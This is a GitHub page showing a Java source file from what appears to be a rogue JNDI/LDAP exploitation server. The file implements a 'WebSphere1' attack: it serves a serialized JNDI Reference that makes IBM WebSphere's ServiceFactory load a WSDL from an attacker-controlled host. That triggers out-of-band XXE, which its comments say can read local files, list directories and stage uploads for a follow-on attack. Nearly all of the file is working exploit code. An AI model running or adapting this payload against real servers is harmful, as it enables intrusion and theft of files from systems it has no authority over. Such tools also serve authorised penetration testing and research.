-
Notifications
You must be signed in to change notification settings - Fork 223
/
Copy pathWebSphere1.java
57 lines (46 loc) · 2.2 KB
/
WebSphere1.java
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
package artsploit.controllers;
import artsploit.Config;
import artsploit.Utilities;
import artsploit.annotations.LdapMapping;
import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
import com.unboundid.ldap.sdk.Entry;
import com.unboundid.ldap.sdk.LDAPResult;
import com.unboundid.ldap.sdk.ResultCode;
import javax.naming.Reference;
import javax.naming.StringRefAddr;
import static artsploit.Utilities.serialize;
/**
* WebSphere1 attack leverages {@link com.ibm.ws.webservices.engine.client.ServiceFactory}
* to download and parse WSDL files from arbitrary locations
*
* Yields:
* OOB XXE in WSDL parsing with the ability to read some files from local disk or list directories
* Could also be used to upload files in the temporary folder for {@link WebSphere2}
* @see artsploit.HttpServer for example of malicious WSDL payloads
*
* Requires:
* - websphere v6-9 libraries in the classpath
*
* @author artsploit
*/
@LdapMapping(uri = { "/o=websphere1", "/o=websphere1,wsdl=*" })
public class WebSphere1 implements LdapController {
public void sendResult(InMemoryInterceptedSearchResult result, String base) throws Exception {
//get wsdl location from the url parameter
String wsdl = Utilities.getDnParam(result.getRequest().getBaseDN(), "wsdl");
if(wsdl == null)
wsdl = "http://" + Config.hostname + ":" + Config.httpPort + Config.wsdl; //get from config if not specified
System.out.println("Sending Websphere1 payload pointing to " + wsdl);
Entry e = new Entry(base);
e.addAttribute("javaClassName", "java.lang.String"); //could be any
//prepare payload that exploits XXE in com.ibm.ws.webservices.engine.client.ServiceFactory
javax.naming.Reference ref = new Reference("ExploitObject",
"com.ibm.ws.webservices.engine.client.ServiceFactory", null);
ref.add(new StringRefAddr("WSDL location", wsdl));
ref.add(new StringRefAddr("service namespace","xxx"));
ref.add(new StringRefAddr("service local part","yyy"));
e.addAttribute("javaSerializedData", serialize(ref));
result.sendSearchEntry(e);
result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
}
}